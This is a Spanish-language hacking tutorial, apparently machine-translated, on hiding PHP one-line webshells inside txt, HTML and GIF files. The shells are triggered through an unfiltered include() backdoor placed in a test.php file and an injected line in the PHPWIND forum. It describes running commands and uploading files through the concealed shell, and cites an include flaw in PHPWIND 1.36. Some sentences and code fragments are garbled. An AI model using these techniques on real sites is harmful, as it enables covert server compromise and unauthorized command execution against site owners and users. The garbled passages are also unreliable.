Recientemente, muchos amigos me han preguntado si puedo ocultar mi troyano de una frase en HTML o imágenes. De hecho, insertar un troyano de una frase en archivos PHP ya está muy oculto. Si insisto en ponerlo en archivos HTML o imágenes. Sigamos leyendo este informe de prueba. Debes saber que si simplemente colocas la declaración PHP en la imagen, no se ejecutará de todos modos, porque PHP solo analiza archivos con la extensión php. Por lo tanto, es necesario poder ejecutar las declaraciones PHP ocultas en la imagen. Simplemente usamos las funciones de llamada en PHP: incluir, requerir, etc.
Todavía recordamos el artículo de hace unos días sobre cómo ocultar troyanos en imágenes. Es decir, utilice declaraciones como include("x.gif") en el archivo PHP para llamar a las declaraciones del caballo de Troya ocultas en la imagen. Las declaraciones en ASP son similares. Parece muy oculto, pero si llamas a la imagen directamente, no será difícil para alguien que sepa un poco sobre PHP encontrar algo sospechoso. Dado que es difícil pasar parámetros utilizando el método GET en la URL, no se puede aprovechar al máximo el rendimiento de la inserción del troyano.
La función Incluir se usa con frecuencia en PHP, por lo que causa demasiados problemas de seguridad. Por ejemplo, la vulnerabilidad de PHPWIND1.36 se debe a la falta de filtrado de las variables detrás de la inclusión. A partir de esto podemos construir declaraciones similares para insertar en archivos PHP. Luego, oculte el troyano en una imagen o archivo HTML, que se puede decir que está más oculto. Por ejemplo, inserte la siguiente declaración en el foro PHPWIND: < ''?@include includ/.$PHPWIND_ROOT;? >Los administradores generales no pueden verlo.
Con la ayuda de la función de inclusión, podemos ocultar troyanos PHP en muchos tipos de archivos, como txt, html y archivos de imagen. Debido a que estos tres tipos de archivos, txt, html y archivos de imagen, son los más comunes en foros y sistemas de artículos, haremos las pruebas en orden a continuación.
Primero cree un archivo PHP test.php. El contenido del archivo es:
$test=$_GET['test'];
@include 'test/'.$test
?>
Los archivos de texto son generalmente archivos de descripción, por lo que ponemos el Troyano de una frase Está bien ir al archivo de descripción del directorio. Simplemente cree un archivo TXT t.txt. Pegamos el troyano de una frase en el archivo t.txt. Luego visite http://localhost/test/test.php?test=../t.txt. Si ve el contenido de t.txt, está bien. Luego agregue la dirección troyana del mini cliente PHP de puerta trasera a http Just. agregue cmd a la contraseña de ://localhost/test/test.php?test=../t.txt y podrá ver los resultados devueltos por la ejecución.
Los archivos HTML, generalmente son archivos de plantilla. Para permitir que el caballo de Troya insertado en el archivo HTML pueda llamarse y ejecutarse sin mostrarse, podemos agregar un cuadro de texto con atributos ocultos en el HTML, como por ejemplo: Luego use el mismo método que el anterior. Los resultados devueltos por la ejecución generalmente se pueden ver viendo el archivo fuente. Por ejemplo, utilice la función de ver el directorio de este programa. Al ver el contenido del archivo fuente, puedo obtener el directorio como C:Uniserver2_7swwwtest.
Ahora hablemos de archivos de imagen. El truco más venenoso es ocultar el caballo de Troya en la imagen. Podemos editar una imagen directamente e insertarla al final de la imagen.
Después de la prueba, generalmente no afectará la imagen. Luego agregamos la dirección del troyano del cliente de la misma manera
y verificamos las variables de entorno PHP. El resultado devuelto es la imagen original.
Puede haber algunas diferencias entre los resultados aquí y lo que imaginamos. De hecho, el comando se ejecutó, pero los resultados devueltos no se pueden ver. Debido a que este es un archivo GIF real, los resultados devueltos no se mostrarán. Pruebe si realmente se ejecuta. Después de recibir el comando, ejecutamos el comando de carga del archivo. Como era de esperar, el archivo se cargó correctamente en el servidor. La ventaja de este tipo de falsificaciones es que quedan bien ocultas. No hace falta decir que la desventaja es que no hay respuesta. Si desea ver los resultados, saque el Bloc de notas y cree un archivo de imagen falso.
En este punto, la prueba básicamente está completa. Cómo ocultar la puerta trasera de PHP depende de su propia elección. La escritura es apresurada, si hay algún problema, ¡indíquelo!